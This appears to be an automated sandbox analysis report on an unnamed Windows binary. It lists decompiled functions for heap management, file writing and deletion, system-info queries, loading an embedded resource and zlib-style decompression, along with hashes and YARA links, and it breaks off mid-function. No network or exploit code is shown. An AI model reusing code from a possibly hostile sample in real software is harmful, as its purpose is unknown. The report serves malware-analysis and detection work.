Instruction ID: 26b5320e93437fcb7b3a7e471c4fbc50e4a3a6070049850fe70d883a15f06819
Opcode Fuzzy Hash: b65472d8892799a2ab790df46868f8da18113432f0cbb7547d7b3206bfd8583f
Instruction Fuzzy Hash: F821A478A00208EFCB00CF98D59499DB7B5FB88314B24C1A9E9199B355D631EE52DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040A970, Relevance: 3.0, APIs: 2, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A970(signed int _a4) {
				void** _t4;
				void** _t11;

				_t9 = _a4;
				if(_a4 != 0xffffffff) {
					_t4 = E0040D3F9( *0x41771c, _t9);
					_t11 = _t4;
					if(_t11 != 0) {
						if(_t11[1] != 0) {
							E0040A9E0(_t11);
							HeapFree( *0x417008, 0, _t11[1]);
						}
						FindCloseChangeNotification( *_t11); // executed
						_t4 = E0040D3AA( *0x41771c, _t9);
					}
					return _t4;
				} else {
					return E0040D995( *0x41771c);
				}
			}

0x0040a971
0x0040a978
0x0040a991
0x0040a996
0x0040a99a
0x0040a9a0
0x0040a9a3
0x0040a9b3
0x0040a9b3
0x0040a9bb
0x0040a9c8
0x0040a9c8
0x0040a9cf
0x0040a97a
0x0040a986
0x0040a986

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040A9B3
FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,004033E8,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040A9BB

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseFindFreeHeapNotification
String ID:
API String ID: 1642550653-0
Opcode ID: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
Instruction ID: 4b594e9f44d889535f58429decad5894e80191ff52abe98a3990b8650259e3e7
Opcode Fuzzy Hash: 1101ea52ee8bc232e257b11b4dfa0e022e50a41f92f453deb7857e88e1fe02c5
Instruction Fuzzy Hash: 45F08272505700ABC7222B99FC05F8BBB72EB91764F12893AF610210F8C7355861DB5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E080, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040E080(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t11;
				void* _t14;
				void* _t15;

				_push(__ecx);
				if(_a8 != 0) {
					_v8 = wcslen(_a8);
					_t14 =  *0x417720; // 0x2790000
					_t15 = RtlAllocateHeap(_t14, 0, _v8 + _v8 + 0xa); // executed
					 *_a4 = _t15;
					return E0040E300(_a4,  *_a4, _a8, _v8);
				}
				return _t11;
			}

0x0040e083
0x0040e088
0x0040e096
0x0040e0a3
0x0040e0a9
0x0040e0b2
0x00000000
0x0040e0c2
0x0040e0ca

APIs

wcslen.MSVCRT ref: 0040E08E
RtlAllocateHeap.NTDLL(02790000,00000000,?,?,00000000,00000000), ref: 0040E0A9

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeapwcslen
String ID:
API String ID: 1345907364-0
Opcode ID: bd3817357f8dc300cfda1f4fd49e484fb32d964938a6f4784871a1af5a5f73de
Instruction ID: e6fe68c807464946a1ef8a296932015239fd020affbeb5486113503193b7cc98
Opcode Fuzzy Hash: bd3817357f8dc300cfda1f4fd49e484fb32d964938a6f4784871a1af5a5f73de
Instruction Fuzzy Hash: 76F05EB5600208FFCB00DFA5D844E9A77B9EB88718F10C46DF9188B380D675EA01CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A759, Relevance: 3.0, APIs: 2, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A759(WCHAR* _a4, signed char _a8) {
				int _t8;

				if(_a4 == 0) {
					return 0;
				}
				if((_a8 & 0x00000002) != 0) {
					SetFileAttributesW(_a4, 0x80);
				}
				_t8 = DeleteFileW(_a4); // executed
				return _t8;
			}

0x0040a75e
0x00000000
0x0040a782
0x0040a765
0x0040a770
0x0040a770
0x0040a77a
0x00000000

APIs

SetFileAttributesW.KERNEL32(00000002,00000080,0040A792,02799B50,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A770
DeleteFileW.KERNELBASE(00000000,0040A792,02799B50,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A77A

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
Instruction ID: 32816558c3505e2600197b6aa1c8e1867431839d95d1f98e5f62e5383a3a81ae
Opcode Fuzzy Hash: d20dcc2b1ea866854d894abaed1435a963998bb33ced13a9451e631658276eaf
Instruction Fuzzy Hash: ECD06730148301A6D2555B20D90D79A7AB16B80786F15C829B485510F5C778C865E60B

Uniqueness

Uniqueness Score: -1.00%

Function 0040DDD0, Relevance: 3.0, APIs: 2, Instructions: 12
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040DDD0() {
				void* _t1;
				void* _t4;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417720 = _t1;
				 *0x416170 = TlsAlloc();
				return E0040E600(_t4);
			}

0x0040dddc
0x0040dde2
0x0040dded
0x0040ddf8

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDDC
TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DDE7

Part of subcall function 0040E600: HeapAlloc.KERNEL32(02790000,00000000,0000000C,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E60E
Part of subcall function 0040E600: HeapAlloc.KERNEL32(02790000,00000000,00000010,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E622
Part of subcall function 0040E600: TlsSetValue.KERNEL32(0000001B,00000000,?,?,0040DDF7,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E64B

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
Instruction ID: 18e5a0edc7d50c2b567692700943758183887443e0587578baab4a09ae3a6d99
Opcode Fuzzy Hash: 4e641117bd55311371697391a61bc67f1fb8624d6db014dbb9304ac05d49361e
Instruction Fuzzy Hash: C9D0127454430467D6002FB1BC0E7843B68B708B46F514C35F619962D1DBB5A000C51C

Uniqueness

Uniqueness Score: -1.00%

Function 00402BFA, Relevance: 1.6, APIs: 1, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402BFA(void* __eflags, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v8;
				WCHAR* _v16;
				WCHAR* _v20;
				char _v24;
				intOrPtr _v36;
				void* _t17;
				void* _t23;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr _t31;
				intOrPtr _t32;
				void* _t35;
				void* _t36;
				intOrPtr* _t37;

				_push(0);
				_push(0);
				_push(0);
				E004051A0(E0040DF60(), _a8);
				_t31 = _v0;
				E00405060(_t37, _t31);
				_v16 = E00409B40(0x2710);
				GetShortPathNameW(_v20, _v16, 0x2710); // executed
				_t17 = E0040DE20();
				_t32 = _t31;
				_push(_t17);
				E00409BB0(_v16, 0xffffffff, E0040DE20());
				E0040DE60( &_v24, _t32);
				E00409B20(_v36);
				_push(_v36);
				_t23 = E0040DE20();
				_pop(_t35);
				E0040DFC0(_t35);
				_t25 = _t23;
				_t26 = E00405170();
				_t36 = _t25;
				_t27 = _t26 + _t36;
				return E0040DEF0(E0040DEF0(_t27,  *_t37), _v8);
			}

0x00402bfc
0x00402bfd
0x00402bfe
0x00402c08
0x00402c0d
0x00402c14
0x00402c23
0x00402c34
0x00402c3a
0x00402c3f
0x00402c40
0x00402c52
0x00402c5c
0x00402c65
0x00402c6e
0x00402c6f
0x00402c74
0x00402c77
0x00402c7c
0x00402c7e
0x00402c83
0x00402c84
0x00402ca6

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51

GetShortPathNameW.KERNEL32 ref: 00402C34

Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B

Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02790000,00000000,?), ref: 0040DE99

Part of subcall function 00409B20: RtlFreeHeap.NTDLL(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B2C

Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040DEF0: HeapFree.KERNEL32(02790000,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
String ID:
API String ID: 192546213-0
Opcode ID: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
Instruction ID: acf91f0b192621483340f6d99b68dad878881d8e8b7377b9fd1201c82249adf8
Opcode Fuzzy Hash: 49f9ea41b9916b6beaa403a6b7ca882e3139740148ba2b07ebcafa5c299e2020
Instruction Fuzzy Hash: E10140755086017AD5007BB1DD06D3F7669EFD0718F10C83FB444B90E2CA3C9C55AA5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040A9E0, Relevance: 1.5, APIs: 1, Instructions: 25
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A9E0(void** _a4) {
				long _v4;
				void** _t18;

				_t18 = _a4;
				_v4 = 0;
				if(_t18[5] != 0) {
					return 0;
				} else {
					WriteFile( *_t18, _t18[1], _t18[2] - _t18[3],  &_v4, 0); // executed
					_t18[3] = _t18[2];
					return _v4;
				}
			}

0x0040a9e2
0x0040a9e6
0x0040a9f2
0x0040aa20
0x0040a9f4
0x0040aa07
0x0040aa10
0x0040aa19
0x0040aa19

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040A9A8,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA07

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
Instruction ID: 14d3056ca1924aee99cb04667f0b380ac70d83ad29f9bf771d01894620e497e9
Opcode Fuzzy Hash: 6b8f9e37b353b02e3b6cb8ff0ca601f404a0ed7efcad3d3714d276d4546e1b8c
Instruction Fuzzy Hash: CBF09276105700AFD720DF58D948B87B7E8EB58721F10C82EE59AD2690C770E854DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC1, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00402BC1() {
				void* _t3;
				void* _t4;
				short* _t6;

				_t4 = 9;
				do {
					_t6 = _t6 - 4;
					 *_t6 = 0;
					_t4 = _t4 - 1;
				} while (_t4 != 0);
				E0040DF60();
				_push(_t6); // executed
				L004050E2(); // executed
				if( *_t6 == 0) {
					_t3 = 0;
				} else {
					_t3 = 1;
				}
				return _t3;
			}

0x00402bc2
0x00402bc7
0x00402bc7
0x00402bca
0x00402bd1
0x00402bd1
0x00402bd4
0x00402bdc
0x00402bdd
0x00402bea
0x00402bf3
0x00402bec
0x00402bec
0x00402bec
0x00402bf9

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
Instruction ID: 8a645f6298b96527a3a9e5c011dcec852996ed75ec820e929ccd6a5cacf3a2a4
Opcode Fuzzy Hash: 2444bb81d38c9911cb4f1a5182d85b53aad325570cca22d2bb76f9bc2955ed15
Instruction Fuzzy Hash: 5FD0126081824986D750BE75850979BB3ECE704304F60887AE085565C1F7FCE9D99657

Uniqueness

Uniqueness Score: -1.00%

Function 00409B40, Relevance: 1.5, APIs: 1, Instructions: 10
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B40(long _a4) {
				long _t2;
				void* _t4;

				_t2 = _a4;
				if(_t2 <= 0) {
					return 0;
				} else {
					_t4 = RtlAllocateHeap( *0x417710, 8, _t2); // executed
					return _t4;
				}
			}

0x00409b40
0x00409b46
0x00409b5c
0x00409b48
0x00409b51
0x00409b57
0x00409b57

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
Instruction ID: 0e995b311a0039e38a6c1dd281e12789fe5386c316f45d3f47623ba04496a456
Opcode Fuzzy Hash: 42056730f6e44905a5b02c626e95f603851e4ed678fa30f00f02d4f5107f6242
Instruction Fuzzy Hash: 7FC04C713542007AD6519B24AE49F5776A9BB70B42F01C8357655E21A5DB30EC10D728

Uniqueness

Uniqueness Score: -1.00%

Function 00409AE0, Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409AE0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x417710 = _t1;
				return _t1;
			}

0x00409ae9
0x00409aef
0x00409af4

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409AE9

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
Instruction ID: 76b444b78102f1190b75b28dd56e974357e96cc3189ac6b4b6122ebffb005697
Opcode Fuzzy Hash: 32b04c5618a60dd8e1d20f587a5187d242f7e9eed40007270aac00d2dcc3d6b4
Instruction Fuzzy Hash: ACB0127038434056E2110B109C06B803520B304F83F104420F211581D4C7E02000C60C

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B20(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x417710, 0, _a4); // executed
				return _t2;
			}

0x00409b2c
0x00409b32

APIs

RtlFreeHeap.NTDLL(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00416020,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B2C

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f3e3bcd985b7116f2e278ca1f63563343cb74ac780ccfe8d01fc63c74dc0a7b9
Instruction ID: fe9ec2d3ce91f197954555b3d321bf450e8b3086e077a3996b15cea7c2da6c74
Opcode Fuzzy Hash: f3e3bcd985b7116f2e278ca1f63563343cb74ac780ccfe8d01fc63c74dc0a7b9
Instruction Fuzzy Hash: 7CB01275205100BFCA024B00FF04F457E32F750B00F01C830B214000F4C3315420EB0C

Uniqueness

Uniqueness Score: -1.00%

Function 00411680, Relevance: 1.3, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411680(signed int _a8, signed int _a12) {
				void* _t5;

				_t5 = malloc(_a8 * _a12); // executed
				return _t5;
			}

0x0041168a
0x00411693

APIs

malloc.MSVCRT ref: 0041168A

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 79a084c717a70a2b6305951e947b0b2a2d876109babb2668130023696ffd0b55
Instruction ID: a7d40c5f4997ffdb313d2f9b6f16fb7c047b00c477a8a3c9f473b961936b746c
Opcode Fuzzy Hash: 79a084c717a70a2b6305951e947b0b2a2d876109babb2668130023696ffd0b55
Instruction Fuzzy Hash: 9FB09275404202AFCA04CB54EA8980ABBA8AE90210F818824F04A8A021C234E1148A0B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004026B8, Relevance: 4.5, APIs: 3, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004026B8(void* __eflags, struct HINSTANCE__* _a4, struct HRSRC__* _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				intOrPtr _t16;
				void** _t17;

				_push(0);
				_push(0);
				E0040DF60();
				_v8 = LoadResource(_a4, _a8);
				 *0x417018 = SizeofResource(_a4, _a8);
				_v8 = E00409B40( *0x417018);
				E00409C20(_v12, _v8,  *0x417018);
				FreeResource( *_t17);
				_t16 = _v20;
				return _t16;
			}

0x004026ba
0x004026bb
0x004026bc
0x004026ce
0x004026de
0x004026ee
0x00402700
0x00402708
0x0040270d
0x00402718

APIs

Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77

LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9

Part of subcall function 00409B40: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409B51

Part of subcall function 00409C20: memcpy.MSVCRT ref: 00409C30

FreeResource.KERNEL32(?,02799B50,02799B50,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708

Memory Dump Source

Source File: 00000000.00000002.548087687.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.548073352.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548129812.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.548158685.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.548181876.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
String ID:
API String ID: 4216414443-0
Opcode ID: bd44d20d037d9532e60a93529e8716f693fb4c78f82d9fc58d9a64d43f7a450a
Instruction ID: aef506374d55060129c4874ad09f8e19456ab50fe59ad62301b1ec8aa9f30053
Opcode Fuzzy Hash: bd44d20d037d9532e60a93529e8716f693fb4c78f82d9fc58d9a64d43f7a450a
Instruction Fuzzy Hash: 3EF07471408301AFDB01AF61DD0186EBEB1FB98344F108C3EB584621B1D7369969AB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E800, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 666
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0040E800() {
				signed int _t719;
				signed int _t721;
				signed char* _t766;
				signed int* _t771;
				signed int _t784;
				void** _t794;
				signed int _t798;
				signed int _t805;
				void* _t812;

				_t771 =  *(_t812 + 4);
				if(_t771 == 0) {
					L369:
					return 0xfffffffe;
				} else {
					_t794 = _t771[7];
					 *(_t812 + 0x14) = _t794;
					if(_t794 == 0 || _t771[3] == 0 ||  *_t771 == 0 && _t771[1] != 0) {
						goto L369;
					} else {
						if( *_t794 == 0xb) {
							 *_t794 = 0xc;
						}
						_t784 = _t794[0xe];
						 *(_t812 + 0x18) = _t771[3];
						_t719 = _t771[4];
						 *(_t812 + 0x10) = _t719;
						 *(_t812 + 0x20) = _t719;
						_t805 = _t771[1];
						 *((intOrPtr*)(_t812 + 0x28)) = 0;
						_t721 =  *_t794;
						 *(_t812 + 0x10) =  *_t771;
						 *(_t812 + 0xc) = _t784;
						 *(_t812 + 0x38) = _t805;
						_t798 = _t794[0xf];
						if(_t721 > 0x1e) {
							L184:
							return 0xfffffffe;
						} else {
							 *(_t812 + 0x40) =  &(_t794[0x15]);
							_t766 =  *(_t812 + 0x14);
							do {
								switch( *((intOrPtr*)(_t721 * 4 +  &M0040FE40))) {
									case 0:
										_t723 = _t794[2];
										if(_t723 != 0) {
											__eflags = _t798 - 0x10;
											if(_t798 >= 0x10) {
												L17:
												__eflags = _t723 & 0x00000002;
												if((_t723 & 0x00000002) == 0) {
													L20:
													_t724 = _t794[8];
													_t794[4] = 0;
													__eflags = _t724;
													if(_t724 != 0) {
														 *(_t724 + 0x30) = 0xffffffff;
													}
													__eflags = _t794[2] & 0x00000001;
													if((_t794[2] & 0x00000001) == 0) {
														L32:
														_t771[6] = "incorrect header check";
														 *_t794 = 0x1d;
													} else {
														_t727 = (_t784 >> 8) + ((_t784 & 0x000000ff) << 8);
														__eflags = _t727 % 0x1f;
														_t784 =  *(_t812 + 0x10);
														if(_t727 % 0x1f != 0) {
															_t771 =  *(_t812 + 0x48);
															goto L32;
														} else {
															__eflags = (_t784 & 0x0000000f) - 8;
															if((_t784 & 0x0000000f) == 8) {
																_t731 = _t794[9];
																_t798 = _t798 - 4;
																_t784 = _t784 >> 4;
																 *(_t812 + 0x10) = _t784;
																_t777 = (_t784 & 0x0000000f) + 8;
																__eflags = _t731;
																if(_t731 != 0) {
																	__eflags = _t777 - _t731;
																	if(_t777 <= _t731) {
																		goto L28;
																	} else {
																		_t771 =  *(_t812 + 0x48);
																		_t771[6] = "invalid window size";
																		 *_t794 = 0x1d;
																	}
																} else {
																	_t794[9] = _t777;
																	L28:
																	_push(0);
																	_push(0);
																	_push(0);
																	_t794[5] = 1 << _t777;
																	_t734 = E00410AD0();
																	_t789 =  *(_t812 + 0x1c);
																	_t812 = _t812 + 0xc;
																	_t771 =  *(_t812 + 0x48);
																	_t794[6] = _t734;
																	_t771[0xc] = _t734;
																	 *_t794 =  !(_t789 >> 8) & 0x00000002 | 0x00000009;
																	_t784 = 0;
																	 *(_t812 + 0x10) = 0;
																	_t798 = 0;
																}
															} else {
																_t771 =  *(_t812 + 0x48);
																_t771[6] = "unknown compression method";
																 *_t794 = 0x1d;
															}
														}
													}
												} else {
													__eflags = _t784 - 0x8b1f;
													if(_t784 != 0x8b1f) {
														goto L20;
													} else {
														_push(0);
														_push(0);
														_push(0);
														_t794[6] = E004102D0();
														_push(2);
														_push(_t812 + 0x28);
														 *((short*)(_t812 + 0x30)) = 0x8b1f;
														_push(_t794[6]);
														_t737 = E004102D0();
														_t784 = 0;
														_t794[6] = _t737;
														_t812 = _t812 + 0x18;
														 *(_t812 + 0x10) = 0;
														_t798 = 0;
														 *_t794 = 1;
														goto L182;
													}
												}
												goto L183;
											} else {
												while(1) {
													__eflags = _t805;
													if(_t805 == 0) {
														goto L103;
													}
													_t761 = ( *_t766 & 0x000000ff) << _t798;
													_t766 =  &(_t766[1]);
													_t784 = _t784 + _t761;
													 *(_t812 + 0x14) = _t766;
													_t798 = _t798 + 8;
													 *(_t812 + 0x10) = _t784;
													_t805 = _t805 - 1;
													__eflags = _t798 - 0x10;
													if(_t798 < 0x10) {
														continue;
													} else {
														_t723 = _t794[2];
														_t771 =  *(_t812 + 0x48);
														goto L17;
													}
													goto L370;
												}
												goto L103;
											}
										} else {
											 *_t794 = 0xc;
											goto L183;
										}
										goto L370;
									case 1:
										__eflags = __esi - 0x10;
										if(__esi >= 0x10) {
											L37:
											 *(__edi + 0x10) = __edx;
											__eflags = __dl - 8;
											if(__dl == 8) {
												__eflags = __edx & 0x0000e000;
												if((__edx & 0x0000e000) == 0) {
													__ecx =  *(__edi + 0x20);
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx = __edx >> 8;
														__eax = __edx >> 0x00000008 & 0x00000001;
														__eflags = __eax;
														 *__ecx = __eax;
													}
													__eflags =  *(__edi + 0x10) & 0x00000200;
													if(( *(__edi + 0x10) & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __dl;
														__eax = __esp + 0x1c;
